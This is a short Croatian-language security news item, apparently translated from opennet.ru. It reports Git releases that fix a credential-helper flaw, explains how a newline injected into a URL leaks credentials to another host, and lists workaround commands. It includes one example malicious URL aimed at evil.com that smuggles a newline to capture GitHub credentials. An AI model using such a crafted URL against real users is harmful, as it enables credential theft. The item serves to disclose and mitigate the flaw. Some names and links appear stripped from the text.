ispravna izdanja sustava za kontrolu distribuiranog izvora Git 2.26.1, 2.25.3, 2.24.2, 2.23.2, 2.22.3, 2.21.2, 2.20.3, 2.19.4, 2.18.3 i 2.17.4, u koji je eliminirao () u rukovatelju "", što uzrokuje slanje vjerodajnica pogrešnom hostu kada git klijent pristupi spremištu pomoću posebno oblikovanog URL-a koji sadrži znak novog retka. Ranjivost se može koristiti za organiziranje slanja vjerodajnica s drugog glavnog računala na poslužitelj koji kontrolira napadač.
Kada navedete URL kao što je “https://evil.com?%0ahost=github.com/”, rukovatelj vjerodajnicama pri povezivanju s hostom evil.com proslijedit će parametre provjere autentičnosti navedene za github.com. Problem se javlja prilikom izvođenja operacija kao što je "git clone", uključujući obradu URL-ova za podmodule (na primjer, "git submodule update" će automatski obraditi URL-ove navedene u datoteci .gitmodules iz repozitorija). Ranjivost je najopasnija u situacijama kada programer klonira repozitorij bez da vidi URL, na primjer, kada radi s podmodulima ili u sustavima koji izvode automatske radnje, na primjer, u skriptama za izgradnju paketa.
Za blokiranje ranjivosti u novim verzijama prosljeđivanje znaka novog retka u svim vrijednostima koje se prenose kroz protokol razmjene vjerodajnica. Za distribucije možete pratiti izdavanje ažuriranja paketa na stranicama , , , , , , .
Kao zaobilazno rješenje za blokiranje problema Nemojte koristiti credential.helper kada pristupate javnim spremištima i nemojte koristiti "git clone" u načinu rada "--recurse-submodules" s neprovjerenim spremištima. Za potpuno onemogućavanje rukovatelja credential.helper, što čini i dohvaćanje lozinki iz , zaštićeno ili datoteku s lozinkama, možete koristiti naredbe:
git config --unset credential.helper
git config --global --unset credential.helper
git config --system --unset credential.helper
Izvor: opennet.ru